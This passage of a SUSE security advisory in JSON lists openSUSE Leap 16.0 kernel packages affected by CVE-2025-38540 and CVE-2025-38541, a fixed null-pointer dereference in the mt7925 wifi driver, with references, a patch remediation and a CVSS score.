"openSUSE Leap 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-27T13:03:55Z",
"details": "moderate"
}
],
"title": "CVE-2025-38540"
},
{
"cve": "CVE-2025-38541",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-38541"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nwifi: mt76: mt7925: Fix null-ptr-deref in mt7925_thermal_init()\n\ndevm_kasprintf() returns NULL on error. Currently, mt7925_thermal_init()\ndoes not check for this case, which results in a NULL pointer\ndereference.\n\nAdd NULL check after devm_kasprintf() to prevent this issue.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"openSUSE Leap 16.0:cluster-md-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dtb-allwinner-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-altera-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amazon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amlogic-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apple-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-arm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-broadcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-cavium-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-exynos-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-freescale-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-hisilicon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-lg-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-marvell-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-mediatek-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-nvidia-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-qcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-renesas-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-rockchip-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-socionext-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-sprd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-xilinx-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-38541",
"url": "https://www.suse.com/security/cve/CVE-2025-38541"
},
{
"category": "external",
"summary": "SUSE Bug 1248216 for CVE-2025-38541",
"url": "https://bugzilla.suse.com/1248216"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"openSUSE Leap 16.0:cluster-md-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:dlm-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dlm-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:dtb-allwinner-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-altera-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amazon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-amlogic-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-apple-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-arm-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-broadcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-cavium-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-exynos-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-freescale-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-hisilicon-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-lg-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-marvell-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-mediatek-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-nvidia-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-qcom-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-renesas-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-rockchip-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-socionext-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-sprd-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:dtb-xilinx-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:gfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:gfs2-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-64kb-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-azure-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-azure-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.aarch64",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.ppc64le",
"openSUSE Leap 16.0:kernel-default-base-6.12.0-160000.26.1.160000.2.7.x86_64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-default-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-default-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-devel-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-docs-html-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-kvmsmall-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-kvmsmall-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-macros-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-build-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-obs-qa-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-devel-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-extra-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-rt-optional-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-rt-vdso-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-source-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-source-vanilla-6.12.0-160000.26.1.noarch",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kernel-syms-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kernel-zfcpdump-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:kselftests-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:kselftests-kmp-rt-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:ocfs2-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:ocfs2-kmp-rt-6.12.0-160000.26.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"openSUSE Leap 16.0:cluster-md-kmp-64kb-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-azure-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.aarch64",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.ppc64le",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.s390x",
"openSUSE Leap 16.0:cluster-md-kmp-default-6.12.0-160000.26.1.x86_64",
"openSUSE Leap 16.0:cluster-md-kmp-rt-6.12.0-160000.26.1.aarch64",
